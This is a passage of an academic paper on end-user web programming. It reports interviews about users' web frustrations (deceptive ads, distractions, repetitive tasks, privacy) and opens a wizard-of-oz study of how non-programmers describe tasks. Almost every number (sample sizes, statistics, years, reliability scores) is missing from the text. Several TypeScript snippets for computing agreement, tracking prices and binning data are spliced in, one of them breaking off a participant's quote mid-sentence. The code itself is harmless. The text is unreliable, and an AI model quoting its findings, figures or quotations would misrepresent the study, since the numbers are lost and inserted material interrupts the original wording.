recent work employs inductive program synthesis techniques—such as programming- by-example and demonstration (cypher et al., ; gulwani, ; rinard, )— that enable end-users to express their needs via demonstrations and examples of what they are trying to accomplish, and the systems generate programs that are consistent with the examples. such programs include string manipulation (gulwani, ), text processing (yessenov et al., ), and geometric drawing (cheema, gulwani & laviola, ). especially for the web, the ‘‘reform’’ system (toomim et al., ) enables end-users to attach ui enhancements to arbitrary sites by selecting a few elements on the page. one approach (nichols & lau, ) enabled end users to re-author a simplified mobile version of web applications by demonstrating the task and directly choosing page elements. another system (macías & fabio, ) allowed users to modify the source code of a web page, and then created a generalized modification of similar pages. inductive programming has become a popular approach, since it requires little experience for users to provide examples and demonstration (rinard, ). nevertheless, even a highly sophisticated synthesis algorithm would be useless if end-users cannot naturally express high-quality examples. in the second study, we examine how users naturally express programming tasks, and explore potential issues and opportunities of symbiotic interaction. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ http://dx.doi.org/ . /peerj-cs. understanding end-user programmers there is a wealth of existing work that has investigated end-user programmers from various perspectives. researchers have been interested in what set of functionalities are simple yet effective for a wide range of tasks. wong & hong ( ) surveyed popular mashups and identified common functionalities including aggregation, personalization, and real-time monitoring. zang & rosson ( ) and zang & rosson ( b) conducted surveys on potential end-user programmers to examine categories of potential mashup applications. in another study, zang & rosson ( ) investigated end-user’s mental models (e.g., where they search information for mashup), and how they use an existing mashup tool to build a simple mashup application. rosson, ballin & rode ( ) also examined differences between professional and informal web developers. our first interview study has similar motivations—to investigate what challenges end-users experience and how they would improve them. while the aforementioned work mostly focused on how existing tools and techniques had been perceived and used by end-user programmers, our interview examines unmet needs from challenges that ordinary people experience. end-user programmers face many challenges that professional programmers do, including understanding requirements, making design decisions, reusing and integrating existing code, managing versions, testing, and debugging (ko et al., ). cao et al. ( a) observed how end-user programmers make design decisions while using popfly, a mashup builder, and suggested implications for effective end-user programming environments. version control and debugging are inevitable parts of programming. kuttal, sarma & rothermel ( ) and kuttal, sarma & rothermel ( ) investigated how end-user programmers control different versions of programs they built and what support they require. cao et al. 
( b) studied how end-users test and debug mashups through a process of successive refinement. a few studies recognized a wide spectrum of end- users, and assigned them different roles. for example, the reform system (toomim et al., ) enables (novice) users to apply enhancements developed by professional end-user programmers. mash maker (ennals et al., ) gives novice and expert end-users different roles: expert users extract semantic structures from raw web sites that novice end-users will use to create mashups. both studies in this paper improve our understanding of end-user software engineering. for example, findings from the interview study report the hidden costs of using third-party extensions. our wizard-of-oz study expands our understanding of non-programmers mental model, especially in collaboration with an intelligent agent. together, the two studies in this paper are complementary to the aforementioned work, providing guidance for the design of future eup systems. study : end-user needs on the web to better understand end-user needs on the web, we conducted a semi-structured interview study. the goal is to better understand the challenges that the participants experience, and enhancement ideas that they envision without technical constraints. the approach is to qualitatively analyze the participant responses to identify themes that should be considered in the development of future webeup systems. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table occupational background of the participants of study . graduate students engineering business psychology education professionals it specialists directors and office managers non-professionals (e.g., homemaker) total participants a total of participants ( male, female) were recruited via a university campus mailing list, social network, and word-of-mouth. they were on average . years old (sd= . ) and have a wide range of occupations as shown in table . every participant spends at least one hour per day on the web. a total of out of participants had used at least one programming language, and five participants had created web pages. however, none of them had the experience of end-user programming on the web. we did not offer any incentive for participation. procedure a total of interviews were conducted via a video chat program with shared screen (google hangout: (https://hangouts.google.com/), while the rest were face-to-face interviews at public areas such as libraries and cafes. the interviewer asked participants, ‘‘show me a couple web sites that you recently visited, tell us challenges that you experienced there. if you could hire a team of designers and developers for free, how would you improve the web sites?’’ we recorded (or videotaped for the face-to-face interviews) the participants visiting two to four sites they recently experienced problems. while demonstrating regular tasks on the sites, participants followed the think-aloud protocol. for the challenges they mentioned, we asked them to imagine a team of third-party developers, and to explain to the ‘‘team’’ an enhancement for the web site. each interview covered approximately three (m = . ) sites, and took approximately – min. the study was found to be exempt from irb review. data and analysis a total of participants demonstrated the use of sites (m = . 
) that included online shopping ( sites), academic research ( ), streaming video ( ), news ( ), work-related sites ( ), forums ( ), search engines ( ), social network services ( ), travel ( ), finance ( ), review sites ( ), job market ( ), and weather ( ). note that these frequencies do not correlate the frequency of regular visits but the challenges that our participants experienced. while visiting the sites the participants explained challenges. every interview video was transcribed, and coded. as an exploratory work, we pursued an iterative analysis lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://hangouts.google.com/ http://dx.doi.org/ . /peerj-cs. approach using a mixture of inductive and deductive coding (hruschka et al., ; braun & clarke, ). first, we created a codebook derived from the literature (zang & rosson, ; cypher et al., ) and an initial post-interview discussion within the research team. the codebook included types of challenges (lack of relevant information, repetitive operations, poorly-organized information, privacy, security, fake information, bugs), and functionalities required for doing a wide range of webeup tasks (mashup, redesign, automation, social knowledge, sharing, monitoring). to assure high quality and reliable coding, two researchers independently coded ten randomly selected ideas. analyzing the inter-rater reliability (irr) of that analysis with krippendorff’s alpha (α= . ; total disagreements = out of ), we revised the codebook. then the two researchers coded another ten randomly selected ideas, and achieved a high irr (α= . ; total disagreements= out of ). after resolving every disagreement, the first researcher coded the remaining data. following the guide of thematic analysis (braun & clarke, ), we collated the different codes into potential themes, and drew initial thematic maps that represent the relationship between codes and themes. we then reviewed and refined the thematic maps, to make sure that data within a theme was internally coherent, and that different themes were distinguished as clearly as possible. the two following subsections summarize the two groups of themes: challenges that participants experience on the web, and functionalities of webeup for addressing those challenges. result: challenges four groups of common challenges and enhancement ideas follow. untruthful information while trust is a key element of success in online environments (corritore, kracher & wiedenbeck, ), participants reported four kinds of untruthful information on the internet. deceptive ads were reported by three participants. two of them reported deceptive advertisements that used confusing or untrue promises to mislead their consumers. for example, p gave a poignant example that a local business review site posts unavailable items on the internet: ‘‘if you’re looking for a contractor to work on your home, and other home stuff, [local business review site] shows them with ratings. a few weeks ago i started paying them again for other information, but they have something very frustrating. they have a several page list of mortgage brokers searchable from [search engine]. but when you pay the fee for their service, they have only a fraction of the information. i complained to them, but they have some stories why it is not... 
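for readers who wish to reproduce the reliability figures reported earlier in this section, krippendorff's alpha for the two-coder, nominal-category case can be computed with a short script such as the one below; the category labels in the usage example are invented, and a full implementation would also handle more than two coders and missing values.

```typescript
// minimal krippendorff's alpha for nominal data, exactly two coders, no gaps.
function krippendorffAlpha(coder1: string[], coder2: string[]): number {
  if (coder1.length !== coder2.length) throw new Error("coders must label the same units");
  const categories = Array.from(new Set([...coder1, ...coder2]));
  const index = new Map(categories.map((c, i) => [c, i] as const));
  const k = categories.length;

  // coincidence matrix: each unit contributes both ordered pairs of its two labels
  const o = Array.from({ length: k }, () => new Array<number>(k).fill(0));
  for (let u = 0; u < coder1.length; u++) {
    const a = index.get(coder1[u])!;
    const b = index.get(coder2[u])!;
    o[a][b] += 1;
    o[b][a] += 1;
  }

  const n = 2 * coder1.length; // total pairable values
  const marginals = o.map(row => row.reduce((s, x) => s + x, 0));

  let observedDisagreement = 0;
  let expectedDisagreement = 0;
  for (let c = 0; c < k; c++) {
    for (let d = 0; d < k; d++) {
      if (c === d) continue;
      observedDisagreement += o[c][d];
      expectedDisagreement += marginals[c] * marginals[d];
    }
  }
  if (expectedDisagreement === 0) return 1; // every label identical
  return 1 - ((n - 1) * observedDisagreement) / expectedDisagreement;
}

// hypothetical labels for ten ideas coded independently by two researchers
console.log(krippendorffAlpha(
  ["ads", "spam", "ads", "virus", "ads", "spam", "virus", "ads", "spam", "ads"],
  ["ads", "spam", "ads", "virus", "ads", "ads", "virus", "ads", "spam", "ads"]
)); // about 0.84 for this sample
```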
anyways, i canceled my membership without getting my one month fee refunded.’’ (p ) another participant tried to avoid using an online marketplace because of deceptive ads in it: ‘‘i know there are rental houses with good value on [online marketplace], but i do not use it often. there are too many liars on [online marketplace]. instead i post on [social network service] to get help or recommendations from people that i trust.’’ (p ) lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. links to low-quality content were reported by seven participants. during the interview, two participants clicked broken links to error pages. five participants reported that they had to spend significant time and effort to find high-quality video links in underground streaming video sites: ‘‘at [underground tv show sites], i have to try every link until i find the first ‘working’ link. by working, i mean the show must be [in] high-resolution, not opening any popup, and most of all as little ads as possible.’’ (p ) a straightforward solution is to attach quality markers next to the links. however, it is extremely challenging to define a metric of high-quality links that everybody will agree upon. virus and malware was reported by four participants. they were aware of the risks of installing programs downloaded from the internet, but estimating risks is often inaccurate. for example, two participants stopped using a streaming video site and a third-party plugin worrying about computer viruses, though in fact, those site and plugins were safe. ‘‘i used this streaming link site for a while, but not after a friend of mine told me her com- puter got infected with malwares from this web site. i wish i could check how trustworthy the site [is] when using [it].’’ (p ) ‘‘i have [used popup blocker extension], but am not using [it] now. those apps have viruses, don’t they? i also don’t use any extensions.’’ (p ) this suggests that end-users may have inaccurate knowledge about the risks of their activities on the internet. even though third-party programs provide terms and conditions, and permission requests, users are often ‘trained’ to give permission to popular apps (chia, yamamoto & asokan, ) as stated by p : ‘‘if the site is important to me, i just press the ‘agree’ button without reading.’’ opinion spam was reported by four participants. while social ratings and consumer reviews are conventional ways to see feedback on products and information, the reliability of the feedback is often questionable (ott et al., ). four participants reported concerns about opinion spam—inappropriate or fraudulent reviews created by hired people. for example, p reflected, ‘‘i saw that some sites have certificates, but they were on their own sites. so, who knows what they’re gonna do with that information? [...] for example, i had a terrible experience with a company that i hired for a kitchen sealing repair, even though they had an a+ rating on [a local business review site].’’ p also expressed concerns about fake reviews, ‘‘ratings are somewhat helpful. however, i cannot fully trust them especially when they have star ratings—they might have asked their friends and families to give them high ratings.’’ similar to deceptive ads, opinion spam is a gateway to serious financial risks such as nigerian scams (corritore, kracher & wiedenbeck, ), but there is no simple way to estimate the risk. summary. 
in order to deal with untruthful information, participants would look for more trustworthy alternatives. for example, p used a social network service instead of online marketplaces. if participants could not find an alternative source, they would assess the risks and benefits of using the untruthful information, and decide either to give up the task or to take the risk, as p said: ‘‘i don’t believe everything on the internet. but sometimes i have no other choices than to try it with caution.’’ the remaining issue is that estimating the risk of untruthful information is often quite difficult. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cognitive distraction most participants reported cognitive distractions that make information on the web hard to understand. we identified four types of cognitive distractions as listed below. abrupt design changes was reported by three participants. websites are occasionally redesigned—from a minor tune-up to a complete overhaul—for good reason. however, it often undermines the prior knowledge of its users, and makes the sites navigation difficult. for example, p could not find her favorite menu item because ‘‘the library recently changed its design, making it much harder to find the menu.’’ since she found a button for switching back to the classic design at the end, she didn’t take advantage of new features in the updated design. p shared a similar story: ‘‘one day facebook suddenly changed the timeline to show this double column view. that was very annoying.’’ annoying advertisements was reported by participants. we found that the degree of cognitive distraction varies across different types of ads. for example, ads with dynamic behavior are much more annoying than static banner ads: ‘‘there are popup ads that cover the content and follow your scrolling. although they usually have very small ‘x’ or ‘close’ buttons, i often miss-click the popup to open the web page. that’s pretty annoying.’’ (p ) this finding is consistent with prior research that found display ads with excessive animation impair user’s accuracy on cognitive tasks (goldstein, mcafee & suri, ). participants were using browser extensions (e.g., chrome adblock http://goo.gl/ra sdc) to automatically remove ads. however, one participant had stopped using it for security and usability issues: ‘‘i have, but am not using [adblock] now. those apps have viruses, don’t they? [...] they would be very useful in the beginning, however they also restrict in many ways. for example, the extension sometimes automatically block crucial popup windows. so i ended up manually pressing ‘x’ buttons.’’ (p ) unintuitive tasks. six participants reported that several websites are hard to use. for example, to create a new album in facebook, users are required to upload pictures first. this task model clearly did not match a participant’s mental model: ‘‘i tried to create a new photo album. but i could not find a way to create a new album without uploading a picture. that was a very annoying experience.’’ (p ). another user reported a similar issue of not being able to create a new contact after searching in a mailing list: ‘‘i’m adding a new person to the contact database. i should first search the last name in order not to put duplicate entry. if the name does not exist, it simply shows [ result found]. obviously i want to add a new entry, but there’s no button for that. 
that bugs me a lot, because i have to get back to the previous page and type the name again.’’ (p ) websites with unintuitive navigational structures would require users to do many repetitive trial-and-errors. ‘‘when preparing to visit a touristic place, i look for entrance fee, direction, and other basic information from their official sites. however, some sites have that information deep in lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://goo.gl/ra sdc http://dx.doi.org/ . /peerj-cs. their menu structure, so i had to spend much time finding them. i wish those information were summarized and shown in one page. sometimes it’s hard to find useful images for campsites or cabins. for example, i want to see the image of bathroom, but people upload pictures of fish they caught.’’ (p ) information overload. five participants reported that excessive and irrelevant information prevents them from understanding the main things that they care about. for example, p was disappointed at blog posts full of irrelevant information: ‘‘i was searching for tips to clean my computer. however, most blog posts have very long explanations of why i should keep computers clean without telling how to clean it till the end.’’ (p ) a long list without effective filtering also causes information overload as p stated: ‘‘i want these conferences filtered by deadline, for example, showing conferences whose deadlines are at least -month from now. also, if possible, the filter can look at descriptions of each venue and choose ones containing at least three relevant keywords.’’ a simple enhancement to solve this problem is to remove unnecessary, excessive information, which is often very hard to decide. for example, p criticized an online shopping site for having a lot of unnecessary and irrelevant information. however, when evaluating usefulness of individual components, she became more vigilant, and stressed that her opinions are personal and depending on her current situation. ‘‘i would remove these promoted products on the side bar. however, if these promotions were relevant to my current interest, i would keep them. [...] shopping cart and personal coupon box can be useful later. [...] i don’t need extra information about secured payment, getting products at the shop, or printing receipts.’’ (p ) to enhance websites with an over-abundance of information, participants envisioned creative scenarios including interactivity and design details. for example, p proposed to add a custom filter for a long list. p wanted to have the personalized summary at the top of a long document with a pop-up window for important information: ‘‘i do not read every terms and condition agreement. it’s too long and mostly irrelevant. however, it would be useful if hidden charges or tricky conditions were highlighted. i think critical information such as hidden charges can be shown in a pop-up window. it would be best the most important summary is shown at the top, because i could just click ’yes’ without scrolling it down.’’ (p ) repetitive operations participants reported tedious and repetitive operations on the web. based on them, we identified three common reasons for repetitive operations. unsupported tasks. seven participants wanted to automate repetitive tasks. efficient repeating of some of the tasks is unsupported by the websites. for example, four participants wanted to automate simple interactions such as downloading multiple files or clicking a range of checkboxes with a single click. 
lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ‘‘[at an academic library], i click the ‘‘save to binder’’ button, then select a binder from the drop-down in a new window. then i click the ‘‘save’’ button then the ‘‘done’’ button, then close the window. it’s really annoying to do it over and over. it would be great to create a ‘‘save this!’’ button.’’ (p ) three participants wanted to automate filling the forms of personal / credit card information. information from multiple sources. reported by participants, integrating information from multiple sources is a common practice on the web (zang & rosson, b). end-users switch between browser tabs to compare information repeatedly, but it can be time consuming since it requires short-term memory to compare information on tabs that are not simultaneously visible. a total of participants wanted to save their time and effort by integrating information across multiple sources. for example, p told, ‘‘i often search for videos on youtube for baby diapers or other things to wear because those videos are very helpful to understand usage of products.’’ similarly, four participants wanted to integrate course schedule page with extra information available such as student reviews, lecture slides, and reading lists. time-sensitive information. five participants reported that they regularly check time- sensitive information such as price ( ), hot deals ( ), second-hand products ( ), and other notifications ( ). using price trends as an example, three participants envisioned a complex service that automatically archives price information retrieved from multiple sites, visualizes the price data as timeline graph, and sends email/mobile notifications when the price drops: ‘‘i can imagine that program or web site will be able to grab information, especially prices from various malls, and compare it automatically. it will also say ‘this is the lowest price for recent three months.’ so that i don’t have to visit amazon and newegg everyday. [...] i want it to send me email alerts—saying ‘hey, based on your recent search history on the canon g , we found these new deals and prices. it’s the lowest price in the last month.’ (p ) ‘‘[she opened http://camelcamelcamel.com] if i want to buy a bread machine, i search and choose one model. here the graph shows the price trend of the model. i can make a decision on whether i should buy or wait. unfortunately, this site only shows products from amazon.com.’’ (p ) privacy privacy did not come up much, but one participant (p ) expressed strong negative opinions about the way that a social networking service handles her data: ‘‘[at a social network service] a friend of mine told me that if i ’like’ her photos or put comment on them, others will be able to see it even if the photos are private. [...] here’s another example that i don’t like about [the sns]. one day i uploaded a family photo, and my family-in-law shared those photos. that’s totally fine. however, the problem began when friends of my family-in-law started liking and commenting on my family photos. i lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://camelcamelcamel.com http://amazon.com http://dx.doi.org/ . /peerj-cs. table potential functionality of web enhancements for addressing categories of challenges and enhancements identified from the interview study. 
( ⊙ : the functionality is required or related to at least half of challenges and enhancements in the category,©: required by less than half,×: no enhancement or challenge in the category required the functionality). modify compute interactivity gather automate store notify untruthful information deceptive ads ⊙ ⊙ © © × × × links to low-quality content ⊙ ⊙ ⊙ © ⊙ ⊙ × virus and malware ⊙ ⊙ ⊙ ⊙ ⊙ ⊙ × opinion spam ⊙ © © ⊙ × ⊙ × cognitive distraction abrupt design changes ⊙ × ⊙ × ⊙ ⊙ × annoying advertisements ⊙ ⊙ ⊙ × ⊙ © × unintuitive tasks ⊙ © ⊙ ⊙ ⊙ × × information overload ⊙ ⊙ ⊙ × © ⊙ × repetitive operations unsupported tasks ⊙ × ⊙ © ⊙ ⊙ × information from multiple sources ⊙ ⊙ ⊙ ⊙ © © © time-sensitive information ⊙ © ⊙ ⊙ ⊙ ⊙ ⊙ privacy © × × × © © © received a lot of notifications of those activities by people i do not know at all. i felt a little scared.’’ (p ) as another example of privacy issues, p believed that her browser tracks her activity history, and shared it with online advertisement companies without her permission, because banner ads on other web pages show ads related to her previous activity. potential functionality of web enhancements this section presents functionalities that we believe future webeup systems should consider providing to address the challenges reported in the previous section. we identified seven functionalities: modify, compute, interactivity, gather, automate, store and notify. table illustrates how closely each functionality is related with the challenges. among them, interactivity, store, and notify are not generally supported by existing webeup systems. modify. modification of existing web pages is the most commonly required functionality for out of enhancements. examples include attaching new dom elements to the original pages ( enhancements), removing or temporarily hiding unnecessary elements ( enhancements), and highlighting information of interest by changing font size, color, or position (five enhancements). modification often involves adding new interactive behavior of web sites (eight enhancements). existing webeup tools support a wide range of modification such as removing unwanted dom elements (bolin et al., ), and attaching new dom elements or interactive behavior to existing elements (toomim et al., ). compute. a total of enhancements require a variety of computing data. for examples, enhancement ideas against untruthful information and distracting content on the web involve filtering elements by certain criteria. nine ideas of integrating lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. information from multiple sources require ‘compute’ functionality to extracting specific information from available documents. seven enhancement ideas require arithmetic operations. while computation is a fundamental part of programming languages, existing eup systems support it in varying degrees. for example, scripting languages (https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) offer an extensive set of language constructs such as general-purpose languages (e.g., javascript). data integration systems (tuchinda, szekely & knoblock, ; wong & hong, ) focus on handling large amount of semi-structured text input, but provide less support on numerical operations. systems for automated browsing (miller et al., ; leshed et al., ) provide few language constructs for computation. interactivity. 
a total of enhancements across all categories (except the privacy issue) require interactive components to accommodate the dynamic and uncertain nature of the web and end-user needs. for example, enhancements include triggering buttons, because users wanted to make use of them in-situ. eight enhancements show previews of changes it will make on the original sites so that users can choose among them. enhancements often require users to configure options such as search keywords, filtering criteria, specific dom elements based on their information needs (eight enhancements). webeup tools often employ predefined interactive components such as buttons and preview widgets (toomim et al., ). however, none of them enable users to create their own interactivity. gather. a total of enhancements involve gathering information from either the current domain ( enhancements) or external sources (five enhancements). for example, to deal with various kinds of untruthful information, enhancements should be able to gather information from trustworthy sources. gathering is an essential part of integrating information from multiple sources, as p stated, ‘‘at various cosmetic malls, i wish the main listing page showed detailed direction on how to use the products.’’ in contrast, participants wanted to gather information from external sources that current sites are missing. infor- mation gathering is supported by mashup tools (wong & hong, ; ennals et al., ; tuchinda, szekely & knoblock, ). automate. a total of enhancements automate repetitive tasks that include filling in input forms (four enhancements), downloading multiple images and files (four), page navigation (three), clicking a series of buttons, checkboxes, and links (three), and keyword search (one). existing webeup tools such as coscripter (leshed et al., ) and inky (miller et al., ) support automating repetitive tasks. store. a total of enhancements store three types of data while being used. the first type relates to user’s activities such as filling input forms, page navigation, and job applications found in five enhancements. the second type is temporal information periodically gathered from designated sources such as online shopping malls, or ticketing sites found in five enhancements. the last is bookmarks of online resources such as news articles, blog posts, or streaming videos found in four enhancements. existing webeup systems such as coscripter (bogart et al., ) often provide public repositories for scripts, but none of them allow end-users to create custom storage of usage data. lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/ http://dx.doi.org/ . /peerj-cs. notify. eight enhancements for integrating information from multiple sources (‘information from multiple sources’) and gathering time-sensitive information (‘time- sensitive information’) involve sending notifications to users via emails (seven) or sms messages (one), periodically or when user-specified events occur. to our knowledge, no existing webeup tool supports notification. discussion in this section, we discuss two design implications for future webeup systems and designing web sites in general. social platform beyond technical support traditional webeup systems focus on lowering the technical barrier of web programming. for example, mashup tools enable users to integrate information from multiple pages with just a few clicks. 
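as a concrete illustration of the store functionality (and of the notification behaviour discussed next), the sketch below records a price snapshot each time a hypothetical product page is visited and raises a browser notification when the price falls below anything seen so far. the selector, the storage key, and the use of localStorage and the Notification api are illustrative choices; the email and sms alerts that participants asked for would additionally require a server-side component.

```typescript
// sketch of per-user 'store' plus a simple 'notify' trigger for time-sensitive
// information. selectors, keys, and thresholds are assumptions for illustration.
interface PricePoint { date: string; price: number }

function trackPrice(productKey: string): void {
  const text = document.querySelector(".product-price")?.textContent ?? "";
  const price = parseFloat(text.replace(/[^0-9.]/g, "")); // "$1,299.00" -> 1299
  if (Number.isNaN(price)) return;

  const key = `price-history:${productKey}`;
  const history: PricePoint[] = JSON.parse(localStorage.getItem(key) ?? "[]");
  const lowestSoFar = history.reduce((min, p) => Math.min(min, p.price), Infinity);

  // append today's snapshot to the custom usage-data store
  history.push({ date: new Date().toISOString().slice(0, 10), price });
  localStorage.setItem(key, JSON.stringify(history));

  // notify when the price drops below everything recorded so far
  if (price < lowestSoFar && Notification.permission === "granted") {
    new Notification(`lowest price so far: $${price}`);
  }
}

trackPrice("canon-g-series-camera");
```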
automation tools allow users to create macro scripts through demonstration. despite the advantage of those technical aids, we noted a few enhancement ideas require domain knowledge of multiple users who have the same information needs. for instance, when end-users want to integrate additional information with original pages, the key question is where the additional information can be found. when users want to focus on an important part of a long text, the key is which part of the text previous visitors found useful (similar to amazon kindle’s ‘‘popular highlights’’ feature.) an example of how a social platform could address the untruthful information issue follows. an end-user programmer creates and deploys an enhancement that attaches an interactive component (e.g., button for rating individual hyperlinks) to the original page. users who have installed the enhancement would use the new component to provide their knowledge (e.g., quality of the linked resources), which will be saved in the enhancement’s database. as more data is collected, the enhancement will become more powerful. to enable end-users to build social platforms in the aforementioned scenario, future webeup systems need two functionalities. first, end-user programmers should be able to create and attach interactive components that collect knowledge and feedback from users. second, end-user programmers should be able to set up centralized servers that communicate with individual enhancements running in each user’s browser, and store collected information. to our knowledge, no prior webeup system has fully supported these functionalities for social platforms. however, there are certainly custom solutions of this type that are commonly used such as, for example, turkopticon https://turkopticon.ucsd.edu/ that helps web workers using amazon mechanical turk rate job creators. alleviate the risk of using enhancements according to the attention investment framework (blackwell & burnett, ), end-users would decide whether to use an enhancement or not as a function of perceived benefit versus cost. even though our participants assumed no development costs, we could identify the following concerns about risks of using enhancements. uncertain needs. as mentioned earlier, the dynamic and uncertain nature of the web and end-user needs requires interactive behavior of enhancements. for example, p lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://turkopticon.ucsd.edu/ http://dx.doi.org/ . /peerj-cs. found advertisements on an online shopping site to be annoying, but did not remove the advertisements because of their potential usefulness in the future. webeup systems should be able to support interactivity so that users can change configurations or make decisions whenever their needs change. otherwise end-users will be forced to stop using it, as p and p did with non-interactive pop-up blockers. breaking the original design. enhancement developers should try to minimize unnecessary change of the original site. two participants expressed concerns about breaking the original site’s design and functionality: ‘‘i think the best part of craigslist is its simplicity. i might have seen the filters, but did not bother setting them every time i visit this site.’’ (p ) privacy and security. end-users have significant privacy and security concerns about installing extra software, especially those developed by third-party programmers. 
ironically, we observed that end-users rarely read legal documents, and are trained to give permissions to popular apps. future work should confront these practical concerns and explore how to communicate potential risks and mitigations.

implications for web site designers

the seven categories of enhancements can be useful to web site designers as they think about what a wide range of users might want. there is also the potential to benefit more directly from end-user modifications to web sites. actual enhancements made by end-users could provide valuable feedback for the designers of the sites if those desires were expressed via use of a webeup tool. for example, designers could learn what kind of information users consider to be untruthful by learning about user feedback on specific information. repetitive operations could be observed by seeing what modifications users make, and so on. nevertheless, such feedback cannot replace webeup, as designers and users often have conflicting interests. for instance, designers may not agree to remove advertisements that end-users find annoying since they provide revenue. some ideas may be useful for specific user groups but not for everyone, and so are not worth pursuing. ideally, designers should consider providing hooks or apis that enable end-users to build robust, high-quality enhancements.

summary

the interview study explored the space of challenges that end-users regularly experience on the web, and the functionalities of enhancements that they envisioned. the seven categories of enhancements can provide guidance to website designers, in the first place to make them aware of the unique needs of many users. also, webeup tools should allow end-user programmers to customize the interactivity and design of the enhancements they create. the interview study has a few limitations. first, the set of participants is surely not large and diverse enough to fully represent the needs that all end-users might have. however, we believe that even this modest number has surfaced a significant number of important areas that need support. second, most participants shared their experience relating to non-professional tasks such as academic searches, shopping, and watching videos, but had little to discuss about professional activities. thus, the findings should be complemented by future research that focuses on professional activities. our exploratory study focused on end-user needs without considering development costs. although our decision allowed end-users to express ideas more freely, future work should ask participants to weigh estimated costs against expected benefits.

study : non-programmers mental model of computational tasks

programming is difficult to learn since its fundamental structure (e.g., looping, if-then conditionals, and variable referencing) is not familiar or natural for non-programmers (pane, myers & ratanamahatana, ). understanding non-programmers' mindset is an important step to develop an easy-to-learn programming environment. the second study builds on the enhancement ideas from the first study by examining how non-programmers naturally describe common computational tasks.

table : occupational background of the participants of study (graduate students in engineering, business, and education; professionals including it specialists, directors, and office managers; and non-professionals such as homemakers).
since the study is designed to be open- ended and formative, participants were not provided with a specific tool or language constructs, but expressed intent via verbal statements, examples, and gestures. they also refined their expression through conversational dialogues with the interviewer using the wizard-of-oz technique. as result, the findings provide broad and general implications of how non-programmers express computational intent, and suggest open-ended research questions for future eup systems. participants the study was conducted with participants, including five males and eight females, average . years old (std = . ) with varying occupations as summarized in table . all of the participants were experienced computer users, but they all said that they had not programmed before. the participants were recruited by the university mailing list that we used in the first study. they received no compensation for participation in this study. method the study aims to characterize how non-programmers naturally describe complex tasks without being biased by specific language constructs or interactive components. we employed the wizard-of-oz technique (zimmerman et al., ) where the interviewer acted as a hypothetical computer agent that could understand the non-programmer’s verbal statements, behavioral signals (e.g., page navigation, mouse click), gestures, and lee and bederson ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. drawing on scratch paper, and help them through conversational dialogue. the computer agent (called ‘‘computer’’ from here on) followed the rules listed below. ( ) the computer can understand all the literal meaning of participants’ instruction, gestures, and drawings. however, the computer cannot automatically infer any semantic meaning of the task or the material. for example, a rental posting ‘‘ bedrooms lvl townhome $ , / br’’ is just a line of text to the computer. ( ) the computer can perceive a pattern from participant’s repeated examples and demonstration. for example, if a participant counted numbers within a range – in a table, the computer asks the participants ‘‘are you counting numbers that are within a specific range?’’ ( ) the computer can execute the participant’s instruction only if it is clearly specified without ambiguity. otherwise the computer asks for additional information to resolve it through conversational dialogue like below: programmer: delete houses with fewer than three bedrooms. computer: please tell me more about ‘houses with fewer than three bedrooms’. which part of the page is relevant? when the programmer demonstrates a set of examples, the computer will suggest a generalizing statement like below: programmer: delete this one because it contains br. computer: do you want me to delete every line that has br? a sheet of paper containing basic instruction was provided, and the participants could draw or write anything on the paper as shown in figs. and . we chose three tasks that end-user programmers commonly do. task . drawing histogram. given a sheet of paper containing a blank histogram and random numbers between and (see fig. ), the participants were asked to explain the computer how to draw a histogram of the numbers. the blank histogram has four bins ( ∼ , ∼ , ∼ , and ∼ ). the purpose of this task was to observe how non-programmers perform: ( ) common data-processing operations (e.g., iteration, filtering, and counting), and ( ) visualize numeric data by examples and demonstration. 
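to make the target of task concrete in conventional code, the following typescript sketch (our own illustration, not an artifact from the study) performs the iteration, filtering, and counting that participants had to convey: it bins a list of numbers into four ranges and counts how many numbers fall into each bin. the bin boundaries and sample data are hypothetical placeholders, since the exact study material is not reproduced here.

// a minimal sketch of the data processing behind task 1: bin numbers and count per bin.
// the bin boundaries below are illustrative placeholders, not the study's exact ranges.
interface Bin {
  label: string;
  min: number; // inclusive lower bound
  max: number; // inclusive upper bound
}

function countPerBin(numbers: number[], bins: Bin[]): Map<string, number> {
  const counts = new Map<string, number>(bins.map((b) => [b.label, 0] as [string, number]));
  for (const n of numbers) {
    // find the first bin whose range contains the number; numbers outside all bins are skipped
    const bin = bins.find((b) => n >= b.min && n <= b.max);
    if (bin !== undefined) {
      counts.set(bin.label, (counts.get(bin.label) ?? 0) + 1);
    }
  }
  return counts;
}

// usage example with hypothetical bins and data
const histogramBins: Bin[] = [
  { label: "0-24", min: 0, max: 24 },
  { label: "25-49", min: 25, max: 49 },
  { label: "50-74", min: 50, max: 74 },
  { label: "75-100", min: 75, max: 100 },
];
console.log(countPerBin([3, 27, 55, 80, 99, 12], histogramBins));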
task . custom filter. we prepared rental postings (table ) copied from an online marketplace (http://craigslist.com). the participants were asked to create a program that removes houses having fewer than three bedrooms. the program consists of three components: ( ) extracting the text that represents the number of bedrooms in each post (e.g., '' br(s),'' '' bedroom(s),'' '' bedrooms,'' '' / ''), ( ) conditional logic for filtering posts with fewer than three bedrooms, and ( ) removing/hiding the filtered houses. the purpose of the task is to observe how non-programmers decompose a big task into sub-tasks, specify extraction queries, and refer to temporary variables such as sub-strings and selected postings.

task . mash up. at amazon.com, each product has different options (e.g., available colors and sizes) that are shown in the product detail page. the participants were asked to create a program that extracts the available colors from the detail pages and attaches them to the product listing. the purpose of the task is to understand how non-programmers would describe copy operations across multiple pages, and event handling.

